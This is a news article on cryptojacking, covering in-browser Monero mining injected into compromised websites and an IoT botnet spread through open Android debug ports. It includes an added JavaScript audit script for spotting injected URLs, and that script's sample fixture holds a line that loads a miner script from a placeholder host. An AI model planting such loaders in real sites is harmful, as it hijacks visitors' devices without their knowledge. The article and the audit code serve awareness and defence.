Cryptocurrency mining is vulnerable to malware infections


According to the latest report from Nokia Threat Intelligence Lab, malware-based cryptocurrency mining has expanded from targeting high-end servers with specialized processors to targeting IoT devices, smartphones and even browsers. The company also stresses the importance of this problem, as cryptocurrency mining will continue its upward trend for years to come.

Competing algorithms

Bitcoin's proof-of-work algorithm is poorly suited to general-purpose processors. It runs much faster on specialized ASICs, FPGAs and GPUs. For this reason, economically viable Bitcoin mining is usually carried out on specialized equipment in places where low-cost electricity is available. Competing cryptocurrencies such as Monero use algorithms that can be run economically on ordinary computer hardware. This has led to a situation where cryptocurrency mining is carried out on IoT bots, mobile phones and even in web browsers. By itself, a single computing device is not powerful enough to earn money, but combined into a botnet such devices become economically viable.

Mining in the browser

According to the security report, the malicious code called RiceWithChicken is JavaScript that performs cryptocurrency mining in the browser. RiceWithChicken is a modified version of CoinHive, a commercial Monero mining service that helps website owners monetize their sites. While CoinHive clearly advertises its presence on websites, RiceWithChicken performs mining operations without the permission of the website owner or the knowledge of visitors to that website.

Links to the RiceWithChicken coin miner have been placed on many compromised websites, usually in a poorly protected JavaScript file. In many cases, multiple copies of this link are injected into the same file, probably due to the use of automated tools by managers. In the following example, a copy of a jQuery library was the site of the code injection.

The user browsing the compromised website will not be aware of this activity running in the background. They will be able to continue browsing the contents of the site without problems, but will experience significantly worse performance on their device. Since this is a browser-based threat, the impact will be felt regardless of the type of device used to navigate the site. The cryptocurrency miner will continue to run until the browser is closed. On a cell phone, the browser usually continues to run in the background when the user switches to another activity, so the coin miner will continue to consume CPU and drain the battery for a while.
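An added example, not taken from the Nokia report or from this article: one way a site owner could check a served JavaScript library for the kind of injected links described above, by listing URLs whose host is not on an allowlist and counting repeated copies. The function name, the allowlist and the sample file contents are constructed for illustration.

```javascript
// Added example: audit a served JavaScript library for URLs that point at
// hosts outside an allowlist, and count how often each one is repeated.
// All hosts and the sample file below are constructed for illustration.

// Matches absolute (http/https) and protocol-relative ("//host/...") URLs.
const URL_PATTERN = /(?:https?:)?\/\/[a-z0-9.-]+\.[a-z]{2,}(?:\/[^\s'"<>)\\]*)?/gi;

function auditScript(source, allowedHosts) {
  const allowed = new Set(allowedHosts.map((h) => h.toLowerCase()));
  const hits = new Map(); // url -> { url, host, count, lines }
  source.split(/\r?\n/).forEach((line, idx) => {
    for (const match of line.matchAll(URL_PATTERN)) {
      const raw = match[0];
      let host;
      try {
        // Protocol-relative URLs need a base before they can be parsed.
        host = new URL(raw, "https://placeholder.invalid").hostname.toLowerCase();
      } catch {
        continue; // not a parseable URL, skip it
      }
      if (allowed.has(host)) continue; // expected reference, e.g. a licence link
      const entry = hits.get(raw) || { url: raw, host, count: 0, lines: [] };
      entry.count += 1;
      entry.lines.push(idx + 1); // 1-based line numbers for the report
      hits.set(raw, entry);
    }
  });
  // Most-repeated first: duplicate copies suggest automated injection.
  return [...hits.values()].sort((a, b) => b.count - a.count);
}

// Constructed sample: a library file with the same loader appended three times.
const SAMPLE = [
  "/*! jQuery-like library (constructed sample) | https://jquery.org/license */",
  "(function(w){ w.lib = { version: '0.0.0' }; })(window);",
  ...Array(3).fill(
    "document.write('<script src=\"https://cdn.miner.example.invalid/lib.js\"><\\/script>');"
  ),
].join("\n");

console.log(auditScript(SAMPLE, ["jquery.org"]));
```

Any host the audit reports should be compared against a known-good copy of the library before the file is trusted again.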

Mining in IoT botnets

A number of cryptocurrency miners are now targeting IoT devices. An example of this is the ADB.Miner bot, which exploits Android-based IoT devices that have an open Android Debug Bridge (ADB) port. ADB is used by developers to debug Android applications and is normally not left open on production devices. However, some Android-based smart TVs, set-top boxes, tablets and other Android-based IoT devices have apparently been shipped with this debug port accidentally left open. This effectively gives the attacker shell access to the device across the network. The coin mining software is loaded via a shell script and the device becomes part of the ADB.Miner botnet. Not only does it start mining coins 24 hours a day, 7 days a week, but like other Mirai-based bots, it also scans the local network and the Internet for other victims.
